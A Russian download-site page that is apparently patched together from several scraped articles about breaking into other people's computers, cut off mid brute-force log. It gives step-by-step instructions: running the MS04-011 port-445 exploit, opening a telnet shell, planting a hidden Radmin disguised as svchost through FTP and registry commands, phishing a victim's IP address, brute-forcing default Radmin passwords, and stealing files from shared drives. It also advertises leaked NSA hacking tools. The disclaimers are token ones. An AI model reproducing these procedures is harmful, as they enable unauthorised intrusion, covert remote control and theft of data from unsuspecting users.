Начальная

Windows Commander

Far
WinNavigator
Frigate
Norton Commander
WinNC
Dos Navigator
Servant Salamander
Turbo Browser

Winamp, Skins, Plugins
Необходимые Утилиты
Текстовые редакторы
Юмор

File managers and best utilites

Как залезть в чужой "комп": простейшие методы. Утилиты взлома удаленных компьютеров


Удалённый взлом ПК через 445 порт

Речь в этой стати будет об элементарной безопасности в локальной сети, многие даже не подозревают, что на первый взгляд маленькая и безобидная сетка с 10 компов может принести много неприятностей, по сети можно не только фильмы друг в друга копировать (если шара открыта ? ) и в контру играть, как думают 90% людей в сети, и игнорируют фаирволы, но и одолжить/утащить из-под носа например номер счёта и пароль кошелька в веб-маней, где все сбережения нашего геймера, который считает, что фаирвол тока ресурсы ПК жрёт и бес толку его ставить. Также здесь будет описан ход проникновения на «вражий» ПК, от сканирования порта до управления файлами, реестром и просмотра рабочего стола, если кто не знает что такое реестр делает «Пуск-Выполнить:REGEDIT» и изучает, или флаг в руки — читает далее. Злоумышленник — если залез в не свой комп и делает зло, но если залез в чужой компутер с благими намерениями, то мы уже умышленник =).Берём любой сканер портов, суть написания сканера портов описана на сайте www.ehteam.jino-net.ru в разделе «Стати / Кодинг» автор Samael, и сканируем локалку на наличие у кого нибуть открытого 445 порта, через который и будем ломится в удалённую машину с помощью експлоита написанного хакером одиночкой houseofdabus, сам же екслоит называется HOD-ms04011-lsasrv-expl (идём к другу, спрашиваем линк на Рамблер, за пиво получаем заветную ссылку и ищем сорс этого експлоита). После удачных поисков найденный сорс компилим в Visual C++ (следует отключить антивирус, если он у вас стоит, иначе ехе-шник вам никогда не увидеть =)

Теперь заботимся о собственной анонимности, ставим прогу VMWare (кто не знает што это, объясню, суть работы – установка и запуск других, гостевых, операционных систем из активной в данный момент, таким образом можно сконфигурировать гостевую ОС для работы в локальной сети, причём она будет иметь свой ІР так, что Ваш основной нигде не светиться), но если вам не страшно что прейдет к вам дядя здоровенный, фейс чистить за якобы случайно форматнутый винт, не ставьте =)

Далее открываем эмуляцию доса, аж 2 окна, с одного будем нападать, с другого культурно телнетом конектиться на атакованный порт ;), если страшный Вам телнет, берём Пюти на этом же сайте.

Запускаем сплойт

Пуск – Выполнить: CMDОкно DOSа: (допустим експлоит перейменували в expl, зачем такое длинное название нам, пока по находишь все буквы на клаве можно забить что делал, и положили в C:\Temp)

C:\Temp\Expl 0 123.456.789.666 666 (давим Enter) тут 0 значит что Ось в жертвы Windows XP Pro, 123.456.789.666 ір жертвы, 666 открываемый порт для телнета, если увидим висяче окно как будет дальше, то всё ОК =)(не стоит забывать, ip сложен из 4 байт, тоесть 0-255,0-255,0-255,0-255, в данном пример используется неправильный ip с личных соображений)[*] Target: IP: 123.456.789.666: OS Windows XP Professional … [*] Connecting to 123.456.789.666:445 … OK [*] Attacking … OK

как только это увидели лезем за телнетом, и конектимся на 123.456.789.666:666,telnet 123.456.789.666 666(в нашем примере это ip атакуемого ПК, порт в диапазоне 0-65500) и только если не стоит модный фаирвол или антивирус со встроенной защитой от разных интернет червей на атакуемой машине, ми имеем заветное %systemroot%\system32\ ну а дальше…. фантазии у нас очень много… Делаем что в голову взбредёт, дарим этому дяди коня троянского, или кейлогера самопального, а чё, пускай юзает. Фантазируем в разумных целях, мы же умишленники, не забили? Например, ставим втихаря через консоль Радмин, для установки надо всего 3 файла, r_server.exe, raddrv.exe, ArmDll.dll как туда закинуть эти файлы дело ваше, мона через фтп, в каждой локалке должен бить фтп, прячем эти файлики, чтобы никто не просек, в консоле удалённой тачки пишем:ftp –A 123.456.789.101 (регистр имеет значение)ключ –А значит, что соединение анонимное 123.456.789.101 – адрес нашего фтп сервера командами:

cd – зайти в каталог;get – качать файл с сервера;put – качать файл на серверуправляем нашими файлами, заливаем и качаем через телнет подключение, предварительно включив binary, иначе файлы будут незапускаемыми, закачка файлов с фтп в директорию, где мы сейчас, пример: ( \incoming\music\dethmetall\I_hask_you_dear_lamer — это наша секретная директория, еще очен важный момент, на фтп должен быть доступ к одной из директорий для записи, если нет, ищем прогу и делаем свой фтп)

Заливаем файлы на сервер, открываем DOS-эмуль, далее:

ftp –A 123.456.789.101cd incomingcd musiccd dethmetallcd I_xask_you_dear_lamer (теперь мы в секретной папке, сюда заливаем)binary (копируем в бинарном (!) режиме)put r_server.exeput raddrv.dllput AdmDll.dll (теперь файлы на фтп)bye (выход с фтп)Теперь заходим так же тока с телнета:ftp –A 123.456.789.101cd incomingcd musiccd dethmetallcd I_xask_you_dear_lamer (теперь мы в секретной папке)ls (смотрим, есть ли наши файлы)r_server.exeraddrv.dllAdmDll.dll (хорошо, все три файла присутствуют)get r_server.exeget raddrv.dllget AdmDll.dll (файлы теперь на «вражеской машине»)bye (покинуть фтп)(при роботе с фтп регистр имеет значение, файлы копируются в директорию, с которой мы зашли на фтп, в данном случае \System32\) Далее работаем над скрытием Радмина от нашего пользователя, а вдруг он окажется умнее чем мы предположили (никогда не недооценивайте(!) ).

Работаем с реестром

Мы в телнет-соединении с атакованным, пишем: REG ADD HKLM\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 (этот ключ скрывает заначек радмина в трее)

Теперь работаем с процессом, если запустить сервер радмина, то увидим нечто неприятное, там процесс r_server, зато svchost.exe примерно 5 процессов, не будет заметно если их станет 6-ть, для этого всего-то переименуем командой: REN r_server.exe svchost.exe.exe (замаскировали) Теперь в телнете же пишем: svchost.exe.exe /pass:lamer_nash /port:666 /install /save /silence (ключ pass — пароль для конекта ;port – изменяем порт на свое усмотрение:install – инсталлируем как сервис;save – теперь эти параметры будут как по умолчатию;silence – не вылазит на взломанной машине окошко «Параметры Сохранены»)теперь запускаем сервер командоюsvchost.exe.exe /startждём пока система переварит что от нее хотят, зависит что делает атакований пользователь, запускам со своёй машины Радмин-клиент radmin.exe и коннектимся на 123,456,789,666:666 Теперь у нас всегда будет в руках этот комп, мы же проинсталлировали Радмин как сервис, до тех пор пока этот ЮЗВЕРЬ не станет умнее, или не найдёт друга поумнее, или Винду за 10 зелёных долларов кто-то ему не переставит =). Позитивный момент: 10-13% имеют средства защиты и небыли взломаны, это уже радует, после прочтения этого материала стоит задуматься, надо фаирвол и антивирус или нет.

PS:

Это было проделано на Осях WinXP pro SP1/SP2, Win2k SP4, во время «теста» хорошо себя показал NortonAntivirus 2005 своею самостоятельностью блокировать 445 порт и орать на весь монитор «Типа вас атаковал ЫР 0,0,0,666 порт 445», фаирвол Оутпост2.0 тоже не пускает. Фаирвол и антивирус Касперского отстой, даже не пикнул, хотя и должен был блокировать, он хорош проверять кто твой комп сканирует и всё ;), при закачке троянов и т.п. через радмин Касперский предлагает удалить или нет, берем опцыю радмина «полный контроль» и быстренько нажымаем разришить, Нортон такие дела сразу блокирует. Во время проведения «мероприятия» было извлечено 15гб фильмов, выпито 4,5 литра пива, прослушано 2 концерта Рамштайн, 1 концерт КиШа, 2,2 часов Баха и Паганини… Информация на атакованных машинах не постраждал, юзверы не постраждали, автор стати тоже не постраждал (пока шо). Использование данного материала в злых намерениях на собственный страх и риск. Помним, УК РФ предусматривает, незаконное сканирование(!) одного(!) адреса, одного(!) порта грозит от 3 до 7 лет(!).

Данная статья предоставлена в ознакомительных целях с возможной опасностью. Автор ответственность за использование данного материала в незаконных целях не несет, проверку правдивости этой стати вы делаете на свой страх и риск.

v-zlom.cc

Как залезть в чужой "комп": простейшие методы

Сегодня достаточно много говорится о взломе чужих компьютеров. Однако, как считают многие эксперты в этой области, правильнее было бы сказать не «как взломать чужой «комп», а «как получить к нему несанкционированный доступ». Ни о каких деструктивных действиях в данном случае и речи быть не может. Попробуем рассмотреть простейшие методы, при помощи которых можно решить проблему, как залезть в чужой «комп».

Вымышленные предубеждения

К сожалению, сегодня у многих пользователей начинает проявляться все больший страх перед тем, что их компьютерные терминалы могут взломать или «хакнуть». Откровенно говоря, это полный бред. Кому вы нужны? Понятно еще, когда на компьютерах или серверах хранится конфиденциальная информация. Тогда, да. Многие не прочь поживиться ею.

как залезть в чужой комп

Домашние компьютерные системы взламывают в основном любители-хулиганы, которым просто нечего делать. Иногда, правда, встречаются и те, кто может украсть пароли доступа к сайтам или коды банковских карт (при условии, что они хранятся на домашнем терминале в незашифрованном виде). Но это редкость.

Разбираясь с тем, как залезть в чужой «комп», можно сказать (как ни странно это звучит), сделать это может даже ребенок при наличии соответствующих утилит и умении ими пользоваться. Рассмотрим самые примитивные способы.

На чем основывается взлом «компа»

В большинстве случаев используется простейший, но самый действенный метод. В принципе, сама проблема, как залезть в чужой «комп», сводится только к получению IP-адреса компьютерного терминала и одного из открытых портов жертвы. Что самое интересное, в большинстве случаев многие любители не избирают кого-то конкретно, а сканируют просто заранее заданный диапазон IP-адресов уязвимых компьютерных систем, так, просто ради интереса или опробования своих сил.

как взломать чужой комп

Поэтому тем, кто уж слишком опасается за свои данные, лучше заранее позаботиться о безопасности, установив соответствующее ПО.

Использование Shared Resource Scanner

Итак, вы задались вопросом о том, как зайти на чужой «комп». Для начала можно применить один из самых простых способов, заключающийся в использовании утилиты Shared Resource Scanner 6.2.

Прежде чем приступать к работе, в командной строке (меню «Выполнить»), к примеру, в Windows XP необходимо ввести команду winipcfg, чтобы узнать собственный IP-адрес. Появится окно с вашим адресом. Его нужно запомнить.

как зайти на чужой комп

Открываем программу и в верхнем поле вводим собственный IP с изменением последних двух цифр на «1». В нижнем поле прописываем тот же IP, только последние две цифры меняем на 255. Строка TimeOut (время истечения ожидания) должна содержать значение «80». Остается нажать кнопку старта сканирования.

По окончании процесса в окне приложения начнут появляться компьютеры, выделенные разным шрифтом. Тонкий шрифт – защищенный терминал, жирный – слабо защищенный, жирный красный – без защиты вообще. Остается выделить компьютер отмеченный красным жирным шрифтом и нажать кнопку «Открыть». О-па! На экране вашего «компа» появились диски и логические разделы чужого компьютера.

Использование онлайн сниффера и XSpider

Несколько более сложным, но более эффективным методом является использование онлайн-сниффера. Для этого нужно зарегистрироваться на определенном сайте (по этическим соображениям не указывается, на каком именно), после чего, к примеру, загружаем какую-то картинку. После этого выдается ссылка на сниффер с содержанием перенаправления (редиректа) на загруженное изображение (тут обязательно нужно поставить галочку напротив строки «Записывать IP в лог»).

Теперь либо с сайта, либо с анонимного электронного почтового ящика отправляете жертве письмо с содержанием типа «На Ваш e-mail отправлено то-то и то-то. Нажмите сюда, чтобы просмотреть».

взлом компа

Теперь жертве остается только перейти по ссылке, и у вас в руках окажется требуемый IP.

В сканере XSpider 7.5 создаем новый профиль и переходим на вкладку «Сканер портов». Внизу рядом с надписью «default.prt» нажимаем еще одну кнопку справа, а в новом окне – кнопку «Новый». Снизу будет строка «Добавить порты». Сюда добавляем «4889» и «3389».

Затем, как было описано выше, создается еще один профиль. После чего в портах добавляется значение «23». Теперь вводим полученный IP жертвы и начинаем сканирование. Если хоть один из портов открыт, пытаемся подключиться. Если будет затребован пароль, по умолчанию вводим «12345678». Все, на компьютере жертвы можно делать все. что заблагорассудится.

Для справки: 4889 – порт Radmin, 3389 – Remote Desktop (Удаленный Рабочий стол), 23 – Telnet.

Программа Lamescan

Теперь несколько слов еще об одном способе, позволяющем узнать, как залезть в чужой «комп». Сначала используется программа VNC-scanner GUI 1.2 на предмет наличия IP-адресов с открытым портом 4899 или 3389.

как залезть в чужой комп

Теперь в приложении Lamescan вводим нужные адреса и подбираем пароль. Можно придумать самому, можно скачать список наиболее часто используемых паролей из Интернета. Как только находится совпадение, можно радоваться.

Этические соображения

В заключение хочется отметить, что данная статья не является побуждением к действию. Это, скорее, общеобразовательный материал, ни в коем случае не несущий вреда пользователям. А тем, кто собирается этим заняться, стоит задуматься о правомерности таких действий и соображениях этики.

fb.ru

Как взломать компьютер - инструкция от хаккера

Июл 13 2014

Рад приветствовать Вас! Из заголовка поста я имею ввиду самый прямой смысл! Это именно так: взломать компьютер может совершенно любой человек, и не важно сколько ему лет, какая у него профессия и прочие. Я же сегодня опишу самый простой и в тоже время 100%-нтный способ попасть в чужой компьютер.

13

На этом примере и будет ясно, что взламывать чужие компы – может каждый. Как бы это печально не звучало, но факт остаётся фактом.

Примечание: Если у Вас в этом деле опыта нет, то рекомендую прочитать пост до конца. Людям, которые уже имеют опыт в данной теме вряд ли будет, что-то интересно из этого поста.

Это не инструкция и не побуждения к действию. Вообще когда я создавал этот блог, я не преследовал мысли писать посты на подобную тему и тем более пошагово описывать действия для взлома чужих компьютеров.

Поэтому я и сказал выше, что именно опишу, а не дам подробной инструкции, как, что пошагово делать, что бы попасть в чужой компьютер.

ЭТО просто мой рассказ! Рассказ о том, как мне самому ещё несколько лет назад удавалось получить доступ и полный контроль над чужими компьютерами, которых только за одну ночь можно было на взламывать пол сотни. Мой рекорд за ночь около 80-десяти компов!

Кто-то может подумать «Вот сидит сволочь такая и хвастается» нет, это не так, поверти.

ВАЖНО: По понятным причинам – Я расскажу про способ, который уже устарел, НО ДО СИХ ПОР им можно пользоваться (Как это не странно) и успешно взламывать чужие компьютеры.

Цель поста: просто донести до читателя, как это было легко и просто в виде рассказа, именно из своего опыта, а не с чьих-то слов!!!

С чего все начиналось или как я узнал про взлом компьютеров

Я не буду рассказывать, зачем я это делал, для чего и зачем мне это надо было. Так как, считаю, что это не особо интересно…

Так же, сама фраза «Взломать компьютер» в этом посте совершенно не уместна! И знаете почему? А вот почему.

В двух словах: На мой взгляд, реальный взлом удалённой системы – это когда человек просто садится, берёт пива, пиццу и начинает работать.

Начинает искать уязвимые места в системы и после их обнаружения пишет под них Exploit-ы и прочие деструктивные программы.Это и есть действительно настоящий взлом и это нихрена не легко – это очень тяжело и требует много знаний…

Так как я не чего не искал эксплойты не писал, я считаю фразу «Взломать компьютер» не уместной. А просто «Баловство», «Хулиганство» как Вам больше нравится.

Но, раз в народе так повелось, если залез в чужой комп, значит взломал, поэтому и дал такой заголовок посту…

Получается я не взламывал компьютеры, я просто получал неправомерный доступ к удалённой системе.

А 90% всей работы за меня сделали другие люди, которые написали программы, с помощью которых я и получал доступ к чужим компьютерам. Именно получал, а не взламывал!!!

В этом вся ПРОСТОТА получения доступа к удалённому компьютеру.

Вот в этом то и есть весь прикол. Все сделано, все написано реально умными ребятами. Мало того, что в интернете много статей по теме, там же много совершенно бесплатных и нужных для этих дел программ.

Что нужно? Не чего сложного, просто скачать нужные программы и научится ими пользоваться и ВСЕ!!! А учится ими пользоваться проще простого!

В интернете даже видеокурс есть «Этичный хакинг и тестирование на проникновение» совершенно в свободном доступе.

Как все было. Получения доступа

Узнав про то, что нужно делать, и опять же – Это легко. Я приступил к делу.

Пошел в интернет, скачал сканер портов, мне тогда понравился «vnc scanner gui»

1

Разыскал списки диапазонов IP адресов всея Руси и её регионов, и это оказалось совершенно просто!!!

Дыра заключалось в порту «4899» (Я об этом ещё скажу пару слов) взял я эти списки IP адресов, просканировал на 4899 порт и получил внушительное количество ИПов с открытым 4899 портом.

Теперь дело оставалось за малым. Нужно было скормить полученные адреса после скана программе вот с таким интересным и осмысливающим названием «Lamescan»

11

Ну а роль этой проги заключалось в банальном подборе пароля и логина, которые можно было выдумать самому или взять в интернете самые часто используемые пользователями.

И если она находила совпадения, а находила она их вообще всегда, то получался такой список.

12

«У меня даже остался старый список подобранных паролей!»

Заключение

Как Вы уже заметили, сложного не чего нет, согласны? Это может сделать любой ребёнок. У меня в ту ночь подобралось около 80-ти компьютеров. Будь я не адекватным идиотом, сколько бед я мог бы принести хозяевам этих компьютеров?

Данный вариант проникновения в чужой компьютер ДО СИХ ПОР остаётся Актуальным!!!

Совет: Следите, что бы не было запущенного процесса «r_server.exe» если таковой имеется, срочно убивайте его и удаляйте файл (r_server.exe) из папки «system32» (НО! Если вы намеренно не пользуетесь программой Radmin).

Radmin – это программа для удалённого управления компьютером. Она коммерческая! Radmin.ru

Дело в том, что умельцы взяли компоненты от оригинального радмина, сам сервер (r_server.exe) и ещё пару DLL нужных для работы и собрали «Скрытый Radmin» получилось, что Radmin сидит в системе и пользователь даже не догадывается до этого!

Таких зараженных компьютеров было много и к некоторым из них удавалось подобрать пароль используя «Lamescan»

Сам же сервер радмина висел на порту 4899 именно поэтому и нужно было сканировать на этот порт.

Были ситуации, когда люди в своих целях пользовались «Radmin-ом» но в версии программы 2.0 или 2.2 точно не вспомню, на серверной части программы по умолчанию стоял пароль «12345678» или «1234567» многие пользователи просто не меняли его и по этой причине появились тысячи уязвимых компьютеров.

Оставалось просканировать диапазон IP адресов и проверить каждый адрес с открытым портом 4899 подходит или нет стандартный пароль.

Как правило стандартные пароли подходили и очень очень часто!

Похожие записи из раздела

kompiklava.ru

Как взломать компьютер, что нужно для взлома компьютера?

Некоторые комментарии заставили обновить запись и написать несколько строк, прошу обратить внимание, прежде чем приступить к чтению самого поста.

  • ДЛЯ ОСОБО ОДАРЁННЫХ ЧИТАТЕЛЕЙ!!!!Это статья не даёт пошаговой инструкции «Как взломать компьютер» Это не призыв к ДЕЙСТВИЮ. Тут речь идёт об общих понятиях, о том, что все вещи которые позволяют проникнуть в чужой ПК доступны в сети для ЛЮБОГО. Цель статьи всего лишь попытка донести до каждого читателя, о простоте сие деяния, о том что не надо быть хакерам, может и школьник хакнуть ваш ПК. В конце даны некоторые рекомендации, как защитить свой ПК именно от способа описанного (в общех чертах) в этой статье. ВСЕ!!!
  • Просьба: Не пишите мне в ВК с предложениями помочь взломать ПК, я не помогу ни платно ни бесплатно. Если имеете подозрения, что Ваш ПК подвергся взлому, пишите, может помогу, не обещаю, я не всемогущий.

Из заголовка поста я имею ввиду самый прямой смысл! Это именно так: взломать компьютер может совершенно любой человек, и не важно сколько ему лет, какая у него профессия и прочие.Я же сегодня опишу самый простой и в тоже время 100%-нтный способ попасть в чужой компьютер. Который уже давно не работает.

Примечание: Если у Вас в этом деле опыта нет, то рекомендую прочитать пост до конца, Вам будет интересно.Людям, которые уже имеют опыт в данной теме вряд ли будет, что-то интересно из этого поста.

Это не инструкция и не побуждения к действию

Вообще когда я создавал этот блог, я не преследовал мысли писать посты на подобную тему и тем более пошагово описывать действия для взлома чужих компьютеров.

Поэтому я и сказал выше, что именно опишу, а не дам подробной инструкции, как, что пошагово делать, что бы попасть в чужой компьютер.

Кто-то может подумать «Вот сидит сволочь такая и хвастается» нет, это не так, поверти.

ВАЖНО: По понятным причинам — Я расскажу про способ, который уже устарел, НО ДО СИХ ПОР им можно пользоваться (Как это не странно) и успешно взламывать чужие компьютеры.

Цель поста: просто донести до читателя, как это было легко и просто в виде рассказа, именно из своего опыта, а не с чьих-то слов!!!

Начало!

Так же, сама фраза «Взломать компьютер» в этом посте совершенно не уместна! И знаете почему? А вот почему.В двух словах: На мой взгляд, реальный взлом удалённой системы – это когда человек просто садится, берёт пива, пиццу и начинает работать. Начинает искать уязвимые места в системы и после их обнаружения пишет под них Exploit-ы и прочие деструктивные программы.Это и есть действительно настоящий взлом и это нихрена не легко – это очень тяжело и требует много знаний…

Так как я не чего не искал эксплойты не писал, я считаю фразу «Взломать компьютер» не уместной. А просто «Баловство», «Хулиганство» как Вам больше нравится.

Но, раз в народе так повелось, если залез в чужой комп, значит взломал, поэтому и дал такой заголовок посту…

Получается я не взламывал компьютеры, я просто получал неправомерный доступ к удалённой системе. На деле это был мой домашний компьютеры, в роли «Удалённой жертвы»

А 90% всей работы за меня сделали другие люди, которые написали программы, с помощью которых я и получал доступ к чужим компьютерам.Именно получал, а не взламывал!!!

В этом вся ПРОСТОТА получения доступа к удалённому компьютеру.Вот в этом то и есть весь прикол. Все сделано, все написано реально умными ребятами. Мало того, что в интернете много статей по теме, там же много совершенно бесплатных и нужных для этих дел программ.

Что нужно? Не чего сложного, просто скачать нужные программы и научится ими пользоваться и ВСЕ!!! А учится ими пользоваться проще простого!

В интернете даже видеокурс есть «Этичный хакинг и тестирование на проникновение» совершенно в свободном доступе.

Как все было. Получения доступа.

Узнав про то, что нужно делать, и опять же – Это легко, так как в инете все есть, все в свободном доступе! Можно пойти в интернет, скачать сканер портов, например «vnc scanner gui»

Разыскать списки диапазонов IP адресов всея Руси и её регионов, и это тоже совершенно просто!!!

Дыра заключалось в порту «4899» (Я об этом ещё скажу пару слов) можно взять эти списки IP адресов, просканировал на 4899 порт и получил внушительное количество ИПов с открытым 4899 портом.

Теперь дело оставалось за малым. Нужно было скормить полученные адреса после скана программе вот с таким интересным и осмысливающим названием «Lamescan»

Ну а роль этой проги заключалось в банальном подборе пароля и логина, которые можно было выдумать самому или взять в интернете самые часто используемые пользователями.

И если она находила совпадения, а находила она их вообще всегда, то может получиться примерно такой список.

 

На последок!

Как Вы уже заметили, сложного не чего нет, согласны? Это может сделать любой ребёнок.Совет: Следите, что бы не было запущенного процесса «r_server.exe» если таковой имеется, срочно убивайте его и удаляйте файл (r_server.exe) из папки «system32» (НО! Если вы намеренно не пользуетесь программой Radmin).

Radmin – Эта программа для удалённого управления компьютером. Она коммерческая! Radmin.ru

Дело в том, что умельцы взяли компоненты от оригинального радмина, сам сервер (r_server.exe) и ещё пару DLL нужных для работы и собрали «Скрытый Radmin» получилось, что Radmin сидит в системе и пользователь даже не догадывается до этого!

Таких зараженных компьютеров было много и к некоторым из них удавалось подобрать пароль используя «Lamescan»

Сам же сервер радмина висел на порту 4899 именно поэтому и нужно было сканировать на этот порт.

Были ситуации, когда люди в своих целях пользовались «Radmin-ом» но в версии программы 2.0 или 2.2 точно не вспомню, на серверной части программы по умолчанию стоял пароль «12345678» или «1234567» многие пользователи просто не меняли его и по этой причине появились тысячи уязвимых компьютеров.

Оставалось просканировать диапазон IP адресов и проверить каждый адрес с открытым портом 4899 подходит или нет стандартный пароль. Как правило стандартные пароли подходили и очень очень часто!

winkomp.ru

ВАЖНО - Программа АНБ для взлома любого пк

Вроде бы чтото очень жесткое, я расшифровал файлы с облака и запустил на виртуалке, но дальше я не понял что делать. Знающие посмотрите работает не работаетРаспакованый файл для вин windows.pass66.7z Пароль 66Видео вроде как юзать: Сам софт:Пароль ReeeeeeeeeeeeeeeShare0-DAY NSA HACKING TOOLS RELEASE BY THE SHADOW BROKERS | GOLOS.io БлогиНиже копипаст статьи: Как пишут мировые IT-эксперты, ссылаясь на публикацию The Intercept, "страшный сон Microsoft стал реальностью". По данным специалистов по компьютерной безопасности, "из лаборатории АНБ утекли вредоносные программы, используемые силовыми органами США (ФБР и АНБ) для получения несанкционированного доступа к компьютерам на базе Windows". Читайте больше на Утилиты АНБ для взлома любого компьютера утекли в Интернет Авторы отмечают, что "уязвимостям нулевого дня" подвержены все недавние версии Windows: XP, Vista, 7, RT, 8, 8.1, 10.

"Утекшее ПО дает любому человеку с достаточными навыками использования компьютера возможность (цитата) "сеять хаос среди милионов пользователей Microsoft", — добавляет автор популярного телеграм-канала "Сайберсекьюрити и Ко" Александр Литреев.

"Также, среди утекших средств взлома — malware для серверных версий Windows, включая самые последние. Обновления безопасности Microsoft еще не выпустила, так что около 90% компьютеров в мире подвержены взлому", — сообщает он.

Один из основателей хакерской группы, эксперт в области кибербезопасности Мэтью Хики заявил, что случившееся трудно переоценить: "Я не думаю, что я когда-либо видел столько средств взлома, одновременно попавших и свободно размещенных в Интернете, хотя я занимаюсь взломами и защитой от них уже 20 лет".

"Скачать эти утилиты и почувствовать себя Сноуденом, а также понять, насколько велик контроль спецслужб США над сотнями миллионов устройств может каждый", — пишут в хакерских чат-конференциях.

"Пишут, что утекшие утилиты АНБ предназначались для получения персональных данных, файлов, слежки (запись с веб-камеры и микрофона) и перехвата интернет-трафика. Праздник к нам приходит", — комментируют утечку пользователи соцсетей.

И действительно, нынешняя утечка включает в себя длинный перечень утилит для взлома — таких как ODDJOB, ZIPPYBEER, и ESTEEMAUDIT. "Жемчужиной коллекции является программа под названием FUZZBUNCH, которая существенно автоматизирует развертывание АНБ вредоносных программ", - пишут авторы статьи. Они также рассказывают, что эта программа "позволяет каждому эксперту АНБ, а теперь и просто любому продвинутому компьютерщику, "заразить" любой выбранный компьютер".

ru-sfera.org

Взлом удалённого компьютера через интернет

Постараюсь объяснить как это сделать так сказать "на пальцах", насколько у меня это получится - не знаю поскольку все это постигал сам... Прежде всего мой совет:      1. Установите на свой компьютер Windows 2k    2. Скачайте и установите на свой компьютер сканер Essential Net Tools v3.0    3. Скачайте и установите на свой компьютер HakTek v1.1    4. NEW!!! IMPORTANT!!! Не забывайте включить протокол Net BEUI и Доступ к файлам и принтерам сети Мелкософт!!    5. В Windows 2000 это делается только в свойствах соединения, а в 9х его еще нужно поставить в свойствах сети!   Ну, пожалуй для начала взлома удаленного компьютера этого вполне достаточно. Хотя нет, скачайте с сайта http://www.pysoft.com/ звонилку Advanced Dialer, ну этого должно хватить...   Теперь некоторые объяснения предыдущих действий:  Для чего нам Windows 2k? Да очень просто - по моим наблюдениям все сканеры лучше и корректнее работают под 2000, кроме этого когда вы нашли потенциальную жертву вам нужно изменить вашу рабочую группу на группу установленную на компьютере жертвы в Windows 2000 это делается так: правая кнопка мыши на >Мой компьютер> выбираем >Сетевая идентификация >Свойства, в нижней части там где написано "Является членом:" должна стоять галочка "Рабочей группы" вы пишите нужное вам имя рабочей группы, нажимаете "ОК" и вам высвечивается приветствие "Добро пожаловать в рабочую группу такую-то", вы нажимаете кнопочку "ОК" и вам предлагается перезагрузить компьютер для вступления в силу изменений, в этот момент вы должны не нажать кнопочку "ОК", как ранее, а просто закрыть окошко, теперь вам просто нужно нажать "ОК" на "Свойствах системы" и опять вас предупредят о том что нужно перезагрузить компьютер, на что вы должны категорично ответить "НЕТ". Поздравляю - изменения вступили - таки в силу без всяких там перезагрузок. В этом еще одна изюминка Windows 2000, поскольку в системах "для домохозяек", а именно 9х, Ме изменения вступают только после перезагрузки! А это все время: время на перезагрузку, на подключение к интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!!  Зачем же нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все....  HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания. Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное!   Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы:   1. Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS   2. Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования "Starting IP adress" (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес "Ending IP adress" (в нашем случае это пусть будет 194.153.128.75, вообще-то конечным должен был бы быть IP 194.153.128.255, но я никогда не видел чтобы кто-то был подключен к адресу более 194.153.128.72, поэтому тратить кучу времени на сканирование еще 180 адресов по-моему просто глупо...   3. После того как процесс сканирования окончен мы увидим примерно следующее:  NAME WORKGROUP RS IP Adress MAC Adress Legioner Legion666 Yes 194.153.128.15 это нас не интересует Vovan Workgroup No 194.153.128.19 это нас не интересует Dmitriy Venera Yes 194.153.128.21 это нас не интересует Sinelnikov Claus Yes 194.153.128.32 это нас не интересует  Kinder Troja Yes 194.153.128.43 это нас не интересует Sky Circus Yes 194.153.128.47 это нас не интересует Trishka Killers No 194.153.128.64 это нас не интересует Judge Dred No 194.153.128.69 это нас не интересует   4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему. Для этого:      1. Включаем NAT    2. Вводим адрес IP - например 194.153.128.15 и нажимаем "SCAN"    3. Теперь немного подождем...   Что мы видим:  * Checking 194.153.128.47 ... * Obtained NetBIOS name table: SKY  SKY CIRCUS SKY CIRCUS DAN CIRCUS ..__MSBROWSE__. * Trying username "ADMINISTRATOR", password "": failed - начало подбора пароля * Trying username "ADMINISTRATOR", password "ADMINISTRATOR": failed  * Trying username "ADMINISTRATOR", password "GUEST": failed * Trying username "ADMINISTRATOR", password "ROOT": failed * Trying username "ADMINISTRATOR", password "ADMIN": failed * Trying username "ADMINISTRATOR", password "PASSWORD": failed * Trying username "ADMINISTRATOR", password "TEMP": failed * Trying username "ADMINISTRATOR", password "SHARE": failed * Trying username "ADMINISTRATOR", password "WRITE": failed * Trying username "ADMINISTRATOR", password "FULL": failed * Trying username "ADMINISTRATOR", password "BOTH": failed  * Trying username "ADMINISTRATOR", password "READ": failed * Trying username "ADMINISTRATOR", password "FILES": failed * Trying username "ADMINISTRATOR", password "DEMO": failed * Trying username "ADMINISTRATOR", password "TEST": failed * Trying username 